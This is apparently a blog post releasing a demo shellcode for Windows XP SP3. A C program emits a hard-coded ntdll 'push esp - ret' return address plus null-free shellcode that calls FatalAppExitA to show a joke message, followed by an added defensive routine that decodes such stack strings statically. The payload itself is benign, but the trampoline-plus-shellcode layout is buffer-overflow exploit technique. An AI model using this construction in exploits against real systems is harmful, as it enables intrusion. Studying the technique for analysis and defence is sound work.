Shellcode for Windows XP SP3 Professional SPA (DLLs version 5.1.2600.5512) / FatalAppExitA W32 API

Following the previous post, I am also releasing here another shellcode used during the demo session. It was tested in the same environment as the previous one: Windows XP SP3 Professional Edition (SPA), kernel32.dll version 5.1.2600.5512 and ntdll.dll version 5.1.2600.5512.


#include <stdio.h>

int main(int argc, char *argv[])
{
    char jmpNtdll[] = "\xB0\x9D\x92\x7C"; // push esp - ret (ntdll.dll), address 0x7C929DB0
    char shellcode[] =
        "\x31\xC9"             // xor ecx, ecx
        "\x51"                 // push ecx        ; NUL terminator for the message
        "\x68\x6C\x61\x21\x21" // push 2121616C   ; "la!!"
        "\x68\x6E\x61\x5F\x6F" // push 6F5F616E   ; "na_o"
        "\x68\x63\x65\x5F\x75" // push 755F6563   ; "ce_u"
        "\x68\x6D\x65\x72\x65" // push 6572656D   ; "mere"
        "\x68\x5F\x73\x65\x5F" // push 5F65735F   ; "_se_"
        "\x68\x6F\x6C\x61\x2C" // push 2C616C6F   ; "ola,"
        "\x68\x6D\x6F\x5F\x6D" // push 6D5F6F6D   ; "mo_m"
        "\x68\x65\x5F\x63\x6F" // push 6F635F65   ; "e_co"
        "\x68\x6E\x4E\x61\x6D" // push 6D614E6E   ; "nNam"
        "\x68\x4E\x6F\x43\x6F" // push 6F436F4E   ; "NoCo"
        "\x68\x45\x73\x61\x5F" // push 5F617345   ; "Esa_"
        "\x8B\xCC"             // mov ecx, esp    ; ecx -> message text
        "\x33\xDB"             // xor ebx, ebx
        "\x51"                 // push ecx        ; lpMessageText
        "\x53"                 // push ebx        ; uAction = 0
        "\xBF\x01\x1C\x86\x7C" // mov edi, kernel32.FatalAppExitA + 1
        "\x4F"                 // dec edi         ; edi = FatalAppExitA (0x7C861C00, keeps 0x00 out of the bytes)
        "\xFF\xD7"             // call edi
        ;

    // Print the return address followed by the payload
    printf("%s%s\n", jmpNtdll, shellcode);
    return 0;
}
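
For anyone triaging a payload like the one above, the message it passes to FatalAppExitA can be recovered statically from the run of push imm32 instructions, without executing anything. The following is an added example, not part of the original post; the function name recover_stack_string and the longest-run heuristic are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

/* Bytes copied from the listing above: xor ecx,ecx / push ecx, the eleven
 * push imm32 instructions, then mov ecx,esp. Nothing here is executed. */
static const unsigned char SAMPLE[] =
    "\x31\xC9\x51"
    "\x68\x6C\x61\x21\x21" "\x68\x6E\x61\x5F\x6F" "\x68\x63\x65\x5F\x75"
    "\x68\x6D\x65\x72\x65" "\x68\x5F\x73\x65\x5F" "\x68\x6F\x6C\x61\x2C"
    "\x68\x6D\x6F\x5F\x6D" "\x68\x65\x5F\x63\x6F" "\x68\x6E\x4E\x61\x6D"
    "\x68\x4E\x6F\x43\x6F" "\x68\x45\x73\x61\x5F"
    "\x8B\xCC";

/* Hypothetical helper: find the longest run of back-to-back "push imm32"
 * (opcode 0x68 + 4 bytes) and rebuild the string it leaves on the stack.
 * The stack grows downward, so the last dword pushed holds the first four
 * characters. Returns the string length (0 if no run or out is too small). */
size_t recover_stack_string(const unsigned char *code, size_t len,
                            char *out, size_t outlen)
{
    size_t best_off = 0, best_cnt = 0;
    for (size_t i = 0; i < len; i++) {
        size_t cnt = 0;
        while (i + 5 * (cnt + 1) <= len && code[i + 5 * cnt] == 0x68)
            cnt++;
        if (cnt > best_cnt) { best_cnt = cnt; best_off = i; }
    }
    if (best_cnt == 0 || best_cnt * 4 + 1 > outlen)
        return 0;
    size_t n = 0;
    for (size_t k = best_cnt; k-- > 0; n += 4)   /* walk pushes last to first */
        memcpy(out + n, code + best_off + 5 * k + 1, 4);
    out[n] = '\0';
    return strlen(out);  /* a NUL inside an immediate ends the string early */
}

int main(void)
{
    char text[128];
    size_t n = recover_stack_string(SAMPLE, sizeof SAMPLE - 1, text, sizeof text);
    printf("%zu bytes: %s\n", n, text);
    return 0;
}
```

The same scan works on any buffer suspected of building a stack string this way; a 0x68 byte that happens to sit inside other instruction data can produce a short false run, which the longest-run choice is meant to outvote.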